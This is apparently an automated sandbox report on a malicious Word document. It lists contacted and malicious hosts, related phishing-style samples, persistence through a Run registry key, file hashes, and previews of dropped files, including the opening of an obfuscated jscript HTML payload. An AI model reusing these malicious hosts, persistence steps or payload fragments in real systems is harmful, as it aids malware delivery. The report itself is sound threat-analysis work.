50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
64.185.227.156	api4.ipify.org	United States		18450	WEBNXUS	false
118.27.125.229	pzsrblog.com	Japan		7506	INTERQGMOInternetIncJP	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	770660
Start date and time:	2022-12-20 14:13:24 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Payment copy_2911022.docx.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@18/35@9/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 206 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.32.24, 20.234.90.154, 20.223.130.133
Excluded domains from analysis (whitelisted): client.wns.windows.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, officeclient.microsoft.com, europe.configsvc1.live.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:16:10	API Interceptor	1x Sleep call for process: PROMZwFp385vXrN.exe modified
14:16:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PMoZbw C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe
14:16:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PMoZbw C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe
14:16:46	API Interceptor	1x Sleep call for process: PMoZbw.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
64.185.227.156	4SZhefNRtQ.exe	Get hash	malicious	Browse	api.ipify.org/?format=txt
	mTCDNn2yjZ.exe	Get hash	malicious	Browse	api.ipify.org/
	img014012022.exe	Get hash	malicious	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api4.ipify.org	BL and PARKING LIST.exe	Get hash	malicious	Browse	64.185.227.156
	USGQ7liDl8.exe	Get hash	malicious	Browse	64.185.227.156
	LCVklLo8QK.exe	Get hash	malicious	Browse	64.185.227.156
	6n22liLGI4.exe	Get hash	malicious	Browse	64.185.227.156
	REMITTANCE COPY..exe	Get hash	malicious	Browse	64.185.227.156
	Bank swift advice.exe	Get hash	malicious	Browse	64.185.227.156
	shipping documents.exe	Get hash	malicious	Browse	64.185.227.156
	Scheduled wire - Chase Bank_SKM_C45822121615300.htm	Get hash	malicious	Browse	64.185.227.156
	Scheduled wire - Chase Bank_SKM_C45822121615300.htm	Get hash	malicious	Browse	64.185.227.156
	Scheduled wire - Chase Bank_SKM_C45822121615300.htm	Get hash	malicious	Browse	64.185.227.156
	New Order 005462438484.exe	Get hash	malicious	Browse	64.185.227.156
	Contract_scanned_documentPDF.html	Get hash	malicious	Browse	64.185.227.156
	AccountStatementSOA#December3068.html	Get hash	malicious	Browse	64.185.227.156
	whatsapp.exe	Get hash	malicious	Browse	64.185.227.156
	4SZhefNRtQ.exe	Get hash	malicious	Browse	64.185.227.156
	9355174059731xlx.html	Get hash	malicious	Browse	64.185.227.156
	ZAMOWIENIE 676973_pdf.exe	Get hash	malicious	Browse	64.185.227.156
	Contract_scanned_documentPDF.html	Get hash	malicious	Browse	64.185.227.156
	DHL.exe	Get hash	malicious	Browse	64.185.227.156
	r6Hmf4nyQO.exe	Get hash	malicious	Browse	64.185.227.156
api.telegram.org	v8i6HA8QyS.exe	Get hash	malicious	Browse	149.154.167.220
	TT Remittance Copy.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	shipping documents.exe	Get hash	malicious	Browse	149.154.167.220
	S009892822118227655644,PDF.exe	Get hash	malicious	Browse	149.154.167.220
	https://dry-mouse-2e93.gasworededdd.workers.dev/	Get hash	malicious	Browse	149.154.167.220
	proposal.PDF.exe	Get hash	malicious	Browse	149.154.167.220
	Prueba de pago.exe	Get hash	malicious	Browse	149.154.167.220
	Messersi 221209-2009.exe	Get hash	malicious	Browse	149.154.167.220
	ZAMOWIENIE 676973_pdf.exe	Get hash	malicious	Browse	149.154.167.220
	https://trk.klclick.com/ls/click?upn=a3ZX-2BW6y3-2FaijReyCxiohVyuJqmK91DgX6kkTzZ3FEgin0YlPRWWRF9GUuHxROVTLZWHclLRPgP8FBNFFW-2F60FHr3v1ILz7YyyMqoPIc3l-2BHAgh9PhweqALQ02zFHMZVYf3D6zb8KoMjd-2Bpin0r9yOW51TGkLKV4Ky2h9XkclSs-3DOMx-_KuZsb-2FWV65CrFHEpg5RAiwzkJM-2BQ2e5LHFLEDKltaHadDVu4N48RVqqA1yR0VLIqLgFIhAcb4ve6hPpM2hdx2o-2FZQ7Qh-2BektvPrj7PBglGisk7S5kPWtaQodRRVYdly1IgF5QMD53lYAOUa5oil07gqsvQMRvbwQq-2FsUg8MSQKm65dBtuN1JYy4EyAG54qZdl-2FagQOPmrn5S-2BQ3JEe9GO7rgqyh3f28i93zEjxzaDUEWJuUcwNq9iJsPSH5tt0uMtuC89yD-2BkjzuaStJ1OzVoUrypl3-2BbKi4fm8pbTJK50LMsBU-2FCT0pcpf1oCVXDgC7zmV8oSnlvLwq0-2FDnka4qqCVXbTDATfJEurkiTqZqLe3mXjelV26N-2BK4id1MI-2BH7HcLGjZcbIHgLu9GeCPciIZa663mZY596A6IANa1VAetdiYMF58VUa1iw4UTFWVHjF	Get hash	malicious	Browse	149.154.167.220
	AWB & Invoice.exe	Get hash	malicious	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.12458.20118.exe	Get hash	malicious	Browse	149.154.167.220
	hesaphareketi-01.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	SCONT-Konic22121113560-1.pdf.exe	Get hash	malicious	Browse	149.154.167.220
	AWB # 1835257406.PDF.exe	Get hash	malicious	Browse	149.154.167.220
	NEW ORDER.exe	Get hash	malicious	Browse	149.154.167.220
	e9YZ2xDnYiKC9Uh.exe	Get hash	malicious	Browse	149.154.167.220
	APPROVED PO NO. 17730 PR 16806 & 16807.exe	Get hash	malicious	Browse	149.154.167.220
	a516b9a.exe	Get hash	malicious	Browse	149.154.167.220
	hesaphareketi-01.pdf.exe	Get hash	malicious	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
INTERQGMOInternetIncJP	file.exe	Get hash	malicious	Browse	118.27.125.181
	file.exe	Get hash	malicious	Browse	118.27.125.181
	SU2xrRCA3S.exe	Get hash	malicious	Browse	118.27.125.181
	icKRjsDL47.exe	Get hash	malicious	Browse	118.27.125.181
	h9Gwq0fYVO.exe	Get hash	malicious	Browse	118.27.125.181
	foNMlXr86C.exe	Get hash	malicious	Browse	118.27.125.181
	https://vk.sv/7-HLkB	Get hash	malicious	Browse	157.7.107.166
	FAX.SCAN005217.doc.html	Get hash	malicious	Browse	157.7.44.238
	http://zxcvbnmasdfghjklqwertyuiop.work/x/002a_fashion-guide.jp.js	Get hash	malicious	Browse	118.27.125.178
	https://mntmnt.com/3S6iC	Get hash	malicious	Browse	160.251.71.94
	gCiRq94ekBiUU0B.exe	Get hash	malicious	Browse	133.130.64.144
	https://www.binaryranking.net/m#michael.stoelting@nrwbank.de	Get hash	malicious	Browse	118.27.125.202
	SKM_C33501911071.exe	Get hash	malicious	Browse	118.27.125.194
	Request for Quotation.exe	Get hash	malicious	Browse	133.130.35.90
	ET3B30WFvUox72P.exe	Get hash	malicious	Browse	133.130.64.144
	DATASHEET- PR no. 8471101093.doc	Get hash	malicious	Browse	157.7.172.129
	87901426.exe	Get hash	malicious	Browse	118.27.125.194
	61805394.exe	Get hash	malicious	Browse	118.27.125.194
	Quotation 2101137.exe	Get hash	malicious	Browse	118.27.125.194
WEBNXUS	BL and PARKING LIST.exe	Get hash	malicious	Browse	64.185.227.156
	USGQ7liDl8.exe	Get hash	malicious	Browse	64.185.227.156
	LCVklLo8QK.exe	Get hash	malicious	Browse	64.185.227.156
	6n22liLGI4.exe	Get hash	malicious	Browse	64.185.227.156
	REMITTANCE COPY..exe	Get hash	malicious	Browse	64.185.227.156
	Bank swift advice.exe	Get hash	malicious	Browse	64.185.227.156
	shipping documents.exe	Get hash	malicious	Browse	64.185.227.156
	Scheduled wire - Chase Bank_SKM_C45822121615300.htm	Get hash	malicious	Browse	64.185.227.156
	Scheduled wire - Chase Bank_SKM_C45822121615300.htm	Get hash	malicious	Browse	64.185.227.156
	Scheduled wire - Chase Bank_SKM_C45822121615300.htm	Get hash	malicious	Browse	64.185.227.156
	New Order 005462438484.exe	Get hash	malicious	Browse	64.185.227.156
	Contract_scanned_documentPDF.html	Get hash	malicious	Browse	64.185.227.156
	AccountStatementSOA#December3068.html	Get hash	malicious	Browse	64.185.227.156
	whatsapp.exe	Get hash	malicious	Browse	64.185.227.156
	4SZhefNRtQ.exe	Get hash	malicious	Browse	64.185.227.156
	9355174059731xlx.html	Get hash	malicious	Browse	64.185.227.156
	ZAMOWIENIE 676973_pdf.exe	Get hash	malicious	Browse	64.185.227.156
	Contract_scanned_documentPDF.html	Get hash	malicious	Browse	64.185.227.156
	DHL.exe	Get hash	malicious	Browse	64.185.227.156
	r6Hmf4nyQO.exe	Get hash	malicious	Browse	64.185.227.156

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	file.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	CnrTX2X8uT.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	Wave Browser.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229
	8HS4ubb7ar.exe	Get hash	malicious	Browse	118.27.125.229
	mAJSpM3Psq.exe	Get hash	malicious	Browse	118.27.125.229
	S3MerznlVr.exe	Get hash	malicious	Browse	118.27.125.229
	file.exe	Get hash	malicious	Browse	118.27.125.229

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.dll	fucker script.exe	Get hash	malicious	Browse
	v4nkfHg4d9.doc	Get hash	malicious	Browse
	Bewerbung.docx	Get hash	malicious	Browse
	nnxPt0Yydv.doc	Get hash	malicious	Browse
	qoIZSkdejM.docx	Get hash	malicious	Browse
	icRTA4gcSe.docx	Get hash	malicious	Browse
	order.docx	Get hash	malicious	Browse
	Court Fine.doc	Get hash	malicious	Browse
	20220714 DWG.doc	Get hash	malicious	Browse
	purchase order.xlsx	Get hash	malicious	Browse
	WF0SlQWKr1.docx	Get hash	malicious	Browse
	V3g2Pfu707.docx	Get hash	malicious	Browse
	5YMh6S8QVr.docx	Get hash	malicious	Browse
	ZDhoKQk8G6.docx	Get hash	malicious	Browse
	TranQuangDai.docx	Get hash	malicious	Browse
	doc782.docx	Get hash	malicious	Browse
	68101181_048154.img	Get hash	malicious	Browse
	doc782.docx	Get hash	malicious	Browse
	doc1712.docx	Get hash	malicious	Browse
	R346ltaP9w.rtf	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PROMZwFp385vXrN.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Microsoft Access Database
Category:	dropped
Size (bytes):	528384
Entropy (8bit):	0.4753811856098096
Encrypted:	false
SSDEEP:	768:/fXyy8gcryGVCINYqP2oiS+XpFY/7B8yk/bgCBH0Zz7kj/1I:/fCCBH057YdI
MD5:	2FBB6AD85C9B8A3CFF19503506735D17
SHA1:	73AFEA2A4F15EFAACFAEA846C6A628DA84C04CEB
SHA-256:	24036F80ABF535E77E8537BA2F5D315CD13AAE6173BFA758DA10A09858674123
SHA-512:	2879BDB5F6F8E59A50FF197A95DE9A0665B6D98AC427A24E3079790424F725EC7476A74D052D1F34E2E5E1823F39420937D5C6D44D1C8582FB3B4C90A3BC087D
Malicious:	false
Preview:	....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N.T.7.....(.`..`';{6....[.C...3G.y[..\|*..\|......59h..f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	36
Entropy (8bit):	2.730660070105504
Encrypted:	false
SSDEEP:	3:5NixJlElGUR:WrEcUR
MD5:	1F830B53CA33A1207A86CE43177016FA
SHA1:	BDF230E1F33AFBA5C9D5A039986C6505E8B09665
SHA-256:	EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
SHA-512:	502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
Malicious:	false
Preview:	C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.4172860556164644
Encrypted:	false
SSDEEP:	3:LVXHaV:R3u
MD5:	546B1C7D84776ECF38D2210A8F145AF4
SHA1:	F22B54B7CC0AAA9ABDA0474B22270004B547361A
SHA-256:	9C1FD366ED3B66F2AB4715459B87CD8B7F289C9ED0C7DAE480D71A8727E23734
SHA-512:	B278A80D43CAE9D873C839FBE49E1C7196E497E6CA96E2192C9E25B38C3EE5974AA18417D09C685FE64008286FF016E8B87F0EA4521E2DE6B4E40578253C2808
Malicious:	false
Preview:	061544. Admin.

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\059BE406-184C-47DB-8766-13F9D87050E0

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	151489
Entropy (8bit):	5.3565536880159055
Encrypted:	false
SSDEEP:	1536:F+C7/gUbB5BQguwU1Q9DQe+zQVk4F77nXmvidlXRHE6Lcz6I:f2Q9DQe+zwXel
MD5:	8A142F0A7799ABC0DA586FCE6D4EDA59
SHA1:	0685020CC7946554AE9EBDDA80000A69A971AECF
SHA-256:	50684A258415BF9A08B3D8177FD499FF55F8131EA513828443672A274E175C62
SHA-512:	CA7CBB4B5A5A59559C8D6DF8A5EFB9DB95C6A1D1EF2CCDB6783532EA984B6ABB8843924A56595A546B2FEAAEFB0DB918D33D06379D43953C48256F483A0335B8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-12-20T13:14:21">.. Build: 16.0.16012.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4B13FC8B.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
Category:	dropped
Size (bytes):	8032
Entropy (8bit):	6.106485999431441
Encrypted:	false
SSDEEP:	96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s
MD5:	7934E5C18F2C7C53DCE7C8C7CE55125D
SHA1:	8C75630C574D0745E4F3B71B26057C990E2BB467
SHA-256:	7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA
SHA-512:	1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13
Malicious:	false
Preview:	<!DOCtYpe HTML>....<HTML>....<BoDY>....<SCrIPt tYPE="tExT/jscriPt">....//h0dZzxaXmdafHlX0peZ3Z6KdUZZJWUzo5yImhiYs23ky3QbfS1f5QchuYj7Z23xqB4rX1uTcMWxKu6tqkeFx4wq67bofKXUQtZUOMJ0leLPGFZ4acpSAwsQE6Rn6pfFZ8jKq7inOpnEKTaouxoSFRC5LQYEQuHsLnrWRhtVUm9a31xlrfuPjxgVSyDI9z73koEGhVdn7PgdwGSaTgNSAu7Kbgh7qUyQo38fAxiJIdgWYcrvltWm3hHDpQIr0oceaSpvNRuj4NRPOUxRlCbVxjxo87HgALrN5tbArN0gRVES1IXnWWuoOQvnafwksWSGLJlZ7BnqSxKpwQMd3kiqsBxnCzYCfiCyPaYHjE2rAd1fiIDcOoJlyOrUzzOD3Ms9HeHRBxWNZQa7qKtPaaziBTOW1YkvZrFT1NDE2l25iFJNttAfd00r4qLXIcuUkb7Zehemp2Nbd0SYLQo2bxfN8tUEr38580F7CVqH3CHcMcLqmJcAULEOu2cEknjqFUQlhi6rGfZluyDNhyNjL6z5wfVBykxwbQRABEgg0p0hKzMJenqND6EalCvmao6WlG4ygxtum5N6dZ5p9Dom5HE4t3gdcsSkFM5rDn0h9sSbsce3jc5Y2WGhrbXR4sIlZAHSpfHCcZ2r52KAwQPO4jcbDIIp1htkI4QSXT1ZjatYGjQII2ZwEqZyTVhTSGYqvTJTP6Vx1KoJTcCdLqNrYjPvAeY1RSWC0njCQT1W0EYojbwIaGan3JOeq8e8zC6y3QQGeVpREevg5avTahzPlVqI0MkS8PaLcmDL75EqE2hcXUSJrZMMiC00DkeeuxEREGs4p7UuWlfF9BnyvHUIxJBwyg7NMmKQPHA8qWtldGaEvcDaLD8tVkeGqavHUm9TgFt9CDkb7wFEuf1Lcn7mPPg8Krt2Lr0ibYoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\70363510.jpg

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=11, description=OLYMPUS DIGITAL CAMERA , model=SP500UZ, software=Corel Photo Album 6, datetime=2007:10:21 17:05:13], baseline, precision 8, 480x640, components 3
Category:	dropped
Size (bytes):	111840
Entropy (8bit):	7.447827528335342
Encrypted:	false
SSDEEP:	3072:/y1vPicYqXVc2XcRz09vkDMaIRFzOuPiSlKd9Y:qdfYqX6G00zfaSlWY
MD5:	4D697D690AB2D1BAC4998162A6EEAE07
SHA1:	6864EAD35FB3B3FBE354AC8D7BC3AFA3204B9522
SHA-256:	23D679960625F65787692D74E87E324E5304B7F923E340322575D330FE510450
SHA-512:	201266787A62F1603C7B908A74B7FBE5A06E38CF581B8B8F8D8D56F9804C6020822E1C3B799321980DAD326E751CE9E0C969979BC96D4A62AC25D7C4259574A9
Malicious:	false
Preview:	......JFIF.....`.`.....vExif..MM.*............. .................1...........2..................................Q...........Q........!..Q........!...i..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9A742D9E.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
Category:	dropped
Size (bytes):	8032
Entropy (8bit):	6.106485999431441
Encrypted:	false
SSDEEP:	96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s
MD5:	7934E5C18F2C7C53DCE7C8C7CE55125D
SHA1:	8C75630C574D0745E4F3B71B26057C990E2BB467
SHA-256:	7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA
SHA-512:	1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13
Malicious:	false
Preview:	<!DOCtYpe HTML>....<HTML>....<BoDY>....<SCrIPt tYPE="tExT/jscriPt">....//h0dZzxaXmdafHlX0peZ3Z6KdUZZJWUzo5yImhiYs23ky3QbfS1f5QchuYj7Z23xqB4rX1uTcMWxKu6tqkeFx4wq67bofKXUQtZUOMJ0leLPGFZ4acpSAwsQE6Rn6pfFZ8jKq7inOpnEKTaouxoSFRC5LQYEQuHsLnrWRhtVUm9a31xlrfuPjxgVSyDI9z73koEGhVdn7PgdwGSaTgNSAu7Kbgh7qUyQo38fAxiJIdgWYcrvltWm3hHDpQIr0oceaSpvNRuj4NRPOUxRlCbVxjxo87HgALrN5tbArN0gRVES1IXnWWuoOQvnafwksWSGLJlZ7BnqSxKpwQMd3kiqsBxnCzYCfiCyPaYHjE2rAd1fiIDcOoJlyOrUzzOD3Ms9HeHRBxWNZQa7qKtPaaziBTOW1YkvZrFT1NDE2l25iFJNttAfd00r4qLXIcuUkb7Zehemp2Nbd0SYLQo2bxfN8tUEr38580F7CVqH3CHcMcLqmJcAULEOu2cEknjqFUQlhi6rGfZluyDNhyNjL6z5wfVBykxwbQRABEgg0p0hKzMJenqND6EalCvmao6WlG4ygxtum5N6dZ5p9Dom5HE4t3gdcsSkFM5rDn0h9sSbsce3jc5Y2WGhrbXR4sIlZAHSpfHCcZ2r52KAwQPO4jcbDIIp1htkI4QSXT1ZjatYGjQII2ZwEqZyTVhTSGYqvTJTP6Vx1KoJTcCdLqNrYjPvAeY1RSWC0njCQT1W0EYojbwIaGan3JOeq8e8zC6y3QQGeVpREevg5avTahzPlVqI0MkS8PaLcmDL75EqE2hcXUSJrZMMiC00DkeeuxEREGs4p7UuWlfF9BnyvHUIxJBwyg7NMmKQPHA8qWtldGaEvcDaLD8tVkeGqavHUm9TgFt9CDkb7wFEuf1Lcn7mPPg8Krt2Lr0ibYoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{1FCF93C7-36B2-4597-9FFA-7A18301AC743}.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Targa image data - Color 32 x 7 x 32 +32 +7 "\007"
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	3.738318846351647
Encrypted:	false
SSDEEP:	192:L/1OrOnuOfOaOiA48zmF6csq6iCXswJL9flwUJM4ZnI0TilzSBzH68NkvHeuSANZ:LAyfW7F93jMLLeE9
MD5:	479F53CA35C4CCACB5BB7B2C159E0AC1
SHA1:	B93AE1BD5919EDD56D46B7CCA3D7A18B395ED4B6
SHA-256:	7A312044D76262BA775A8CDF4A2A4CE63E77D4B7ABBB6A463CFF321322CC59FA
SHA-512:	761101D71A3EAEDB308E824C9F43248B0CB2B1912CFE6FF4459BEC5DEDCD8226223C2509E66CB94ED46B7EB71448005DAB9BF524E0622133A5A8B42F0BA1FDE0
Malicious:	false
Preview:	.. ..... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ...P.R.O.-.F.O.R.M.A. .I.N.V.O.I.C.E..... ....... ...C.o.m.p.a.n.y. .:...A.L. .J.A.D.D. .T.R.A.D.I.N.G. .&.C.O.N.T...E.S.T.....I.n.v.o.i.c.e. .#. .:. .1.4.7.1.9..... .....A.d.d.r.e.s.s. .:...S.A.L.A.L.A.H...O.M.A.N.....D.a.t.e. .:...1.7.-.0.7.-.2.0.1.9..... ......... ......... .....T.e.l. .:............................................. ...$...............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{BE0195EF-DE76-44B4-A06B-70C1544DDB6A}.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

